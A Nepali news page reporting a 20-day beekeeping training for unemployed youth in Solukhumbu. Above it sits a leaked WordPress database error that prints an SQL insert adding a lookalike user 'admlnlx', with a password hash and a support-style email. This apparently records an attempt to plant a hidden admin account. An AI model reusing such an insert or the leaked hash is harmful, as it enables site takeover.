WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BA/K7LXbVa5J2o8slMoh4CZxv7WigR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 13:20:39', '', 'admlnlx', 'admlnlx')
गाँउले न्यूज–१३ फाल्गुण, काठमाडौं : सोलुखुम्बु स्थित माप्य दुधकोशी गाउपालिकाको केन्द्र नजिकै खास्तापमा २० दिने मौरी पालन तालिम आजबाट सुरु गरिएको छ ।
जिल्ला घरेलु तथा साना उध्योग बिकास समिति र माप्य दुधकोशी गाउपालिकाको आयोजनामा सन्चालित सो तालिममा लगभक २० जनाको सहभागिता रहेको छ ।
बेरोजगार युवाहरुलाई केन्द्रित गरी मौरी पालनलाई ब्यबसायिकरन गर्ने र बैदेशिक रोजगारमा बढ्दो युवाहरुको चापलाई यही शिप र तालिम दिएर स्वोरोजगार गराउने,गाउ र समाजको बिकासलाई आधुनिकिकरन गर्ने उदेश्यले तालिमा सन्चालन गरिएको माप्य दुधकोशी गाउपालिकाका उपाध्यक्ष जुनिता मगरले गाउले न्युजलाई जानकारी गराउनु भयो ।